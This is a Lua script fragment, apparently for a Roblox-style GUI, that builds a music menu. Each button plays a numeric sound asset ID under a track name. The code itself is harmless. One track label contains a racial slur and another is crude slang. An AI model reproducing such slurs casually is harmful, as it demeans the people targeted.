Music:Button("Rootkit", function() playSound("5410081542") end)
Music:Button("Say So", function() playSound("1840036018") end)
Music:Button("The Future", function() playSound("1837358800") end)
Music:Button("Feel Your Heart", function() playSound("5410082171") end)
Music:Button("Forward", function() playSound("5410081471") end)
Music:Button("No Sleep", function() playSound("7029011778") end)
Music:Button("That's A Thot", function() playSound("6772846771") end)
Music:Button("Pixel Terror", function() playSound("5410080475") end)
Music:Button("Labyrinth", function() playSound("7023690024") end)
Music:Button("All I Want", function() playSound("7023680426") end)
Music:Button("Sad Nigga Hours", function() playSound("6806140478") end)
Music:Button("Colors", function() playSound("5410086062") end)
Music:Button("You Used To", function() playSound("7023720291") end)
Music:Button("GEN", function() playSound("6788646778") end)
Music:Button("Coral Sea", function() playSound("1839253629", true) end)
Music:Button("King", function() playSound("1840030788") end)
Music:Button("Chasing Clouds", function() playSound("5410082097") end)
Music:Button("Pendulum", function() playSound("1843384804", true) end)
Music:Button("She Make Me", function() playSound("1841807265", true) end)
Music:Button("Im So Alone", function() playSound("6774872457") end)
Music:Button("Hate Me", function() playSound("6873260626") end)
Music:Button("Safe & Sound", function() playSound("7024233823") end)
Music:Button("Dreamers", function() playSound("7029083554", true) end)
Music:Button("Internet Boy", function() playSound("5410084870") end)
Music:Button("Let's Play", function() playSound("5410085763") end)
Music:Button("Night", function() playSound("1836879421") end)
Music:Button("Pull Over", function() playSound("1839983980") end)
Music:Button("WRLD - Hang Up", function() playSound("5410084188") end)
Music:Button("Deja Vu", function() playSound("6781116057") end)
Music:Button("Give The World", function() playSound("1836778353") end)
Music:Button("Top Of The World", function() playSound("1836847994") end)
Music:Button("Siren", function() playSound("1840056866") end)
Music:Button("OverTime", function() playSound("1842019862") end)
Music:Button("Ya Life - this was hard to find", function() playSound("6831109213") end)
Music:Button("Unknown Song - NEW", function() playSound("1840044242") end)
Music:Button("Hours, Hours.", function() playSound("7028932563") end)
Music:Button("Weekend", function() playSound("1837083064", true) end)
Music:Button("Glacler", function() playSound("7023760529", true) end)
Music:Button("Only You", function() playSound("7024028859", true) end)
Music:Button("Hyper", function() playSound("7023887630", true) end)
Music:Button("Play Cool", function() playSound("7029017448", true) end)
Music:Button("You Used Me", function() playSound("7023720291", true) end)
Music:Button("What It's Like", function() playSound("7028997537", true) end)
Music:Button("New World", function() playSound("5410082346", true) end)
Music:Button("TOMB", function() playSound("6782202354", true) end)
Music:Button("Feel like you take me", function() playSound("7029070008", true) end)
Music:Button("I been thinking About You", function() playSound("7023445033", true) end)
